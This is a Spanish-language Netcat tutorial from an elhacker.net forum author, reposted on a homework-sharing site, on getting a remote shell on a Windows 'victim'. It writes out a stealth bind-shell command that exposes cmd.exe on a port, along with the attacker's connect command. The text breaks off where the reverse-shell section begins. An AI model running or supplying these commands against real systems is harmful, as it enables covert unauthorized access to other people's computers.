Shell remota

Páginas: 11 (2529 palabras) Publicado: 10 de octubre de 2013
Obtener Shell con Netcat by zhyzura
Foro.elhacker.net

OBTENER SHELL
CON NETCAT
BY ZHYZURA

1

Obtener Shell con Netcat by zhyzura
Foro.elhacker.net

¡Atención!
El contenido en este manual es meramente educativo, las prácticas se
llevaron a cabo en equipos supervisados y con el consentimiento del
propietario.
El autor y los colaboradores no se hacen responsables del mal uso quese
le pueda dar al contenido expuesto en el presento texto, por lo cual se
pide al lector tener las debidas precauciones y usarlo de una manera
correcta ;).

Este manual esta enfocado para todas aquellas personas que deseen
aprender a utilizar una de las tantas utilidades que tiene el Netcat la cual
consiste en obtener una shell en un equipo remoto.
Para obtener una mayor comprensión deltexto se recomienda que el
lector tenga nociones sobre el registro de Windows y manejo de
comandos desde ms-dos.
Cabe decir que como este manual esta exclusivamente enfocado en el
uso del netcat, el lector deberá de tener conocimientos previos de cómo
realizar una intrusión en un equipo remoto, ya sea por medio de la
ingeniería social, exploits, troyanos, acceso físico, etc..
Recuerden queantes de ejecutar los comandos del netcat se le deberá de
subir el nc.exe al equipo victima, ya sea por FTP o TFTP.
Para mi práctica voy a utilizar dos equipos:
Equipo atacante [192.168.1.2]: Windows xp sp1.
Equipo víctima [192.168.1.4]: Windows xp Sp2.

2

Obtener Shell con Netcat by zhyzura
Foro.elhacker.net

[ SHELL DIRECTA CON LA VICTIMA ]
Nota: si utilizas un puerto el cual esteprotegido por el firewall de
windows tendrás que habilitarlo previamente para poderlo poner a la
escucha.
Para lograr este tipo de conexión lo único que necesitamos de hacer es
dejar un netcat a la escucha en la victima de la siguiente manera (solo
decir que en win9x seria "command.com" y en un NT seria "cmd.exe"):
nc -l -d -e cmd.exe -p 6000
donde los flags significan lo siguiente:
-d (ModoStealth o encubierto)
Esta opción desvincula al Programa de la consola, haciéndolo
trabajar en el BackGround.
-e (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto en WinX como en
*NIX.
-l (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión
-p (Puerto para pegarse)
Algunas veces debes especificarle con esta opción elpuerto a realizar una
acción.
-v (modo verbose, mas información, se le puede añadir otra -v para
mas info. todavía) Bastante útil y necesario.
-L Es mas recomendable usar esta opción que la opción "-l" ya que al
cerrar una conexión podemos volver a iniciarla sin necesidad de que el
equipo victima vuelva a reiniciar su pc. (en mis ejemplos voy a usar -l
pero sugiero poner -L)
Nota: Lo ideales que tengas el nc.exe dentro de la carpeta system32(en
caso de ser un NT) o en la carpeta system(si es un win9x), en caso
contrario cada vez que quieras ejecutar un comando del netcat tendrás
que especificar la dirección en la que se encuentra, ejemplo:
C:\mi carpeta\nc -l -d -e cmd.exe -p 6000
Una vez hecho esto solo falta que nosotros nos conectemos a la victima

3

Obtener Shellcon Netcat by zhyzura
Foro.elhacker.net

en el puerto especificado (en este caso es el 6000), y así nos devolverá la
shell:
nc -vv 192.168.1.4 6000
Recuerden que para que este tipo de conexión funcione, la victima tiene
que tener una "ip publica", esto es que sea visible por cualquier equipo
con el simple hecho de que este conectado a internet.

4

Obtener Shell con Netcat by zhyzuraForo.elhacker.net

[ REVERSE SHELL CON NETCAT ]
Este tipo de conexión es ideal para equipos que se encuentran dentro de
una red, lo único que necesitamos es que el equipo atacante tenga una
"ip publica", de esta manera será la victima quien se conecte a nosotros y
no nosotros con el, si el equipo atacante no posee una ip estática lo mas
conveniente es que registre un dominio no-ip en la...
Leer documento completo

Regístrate para leer el documento completo.

Estos documentos también te pueden resultar útiles

  • SHELL
  • Shell
  • Shell
  • Shell
  • Shell
  • Shell
  • Shell
  • shell

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS